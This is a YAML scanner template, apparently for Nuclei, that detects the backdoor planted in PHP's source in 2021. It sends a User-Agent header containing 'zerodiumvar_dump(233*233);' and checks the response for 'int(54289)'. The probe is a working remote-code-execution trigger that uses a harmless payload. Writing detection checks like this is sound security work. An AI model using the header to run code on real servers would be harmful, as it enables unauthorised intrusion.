id: php-zerodium-backdoor-rce info: name: PHP Zerodium Backdoor RCE author: dhiyaneshDk description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code. reference: https://news-web.php.net/php.internals/113838 severity: critical tags: php,backdoor requests: - method: GET path: - "{{BaseURL}}" headers: User-Agent: zerodiumvar_dump(233*233); matchers-condition: and matchers: - type: word words: - "int(54289)" part: body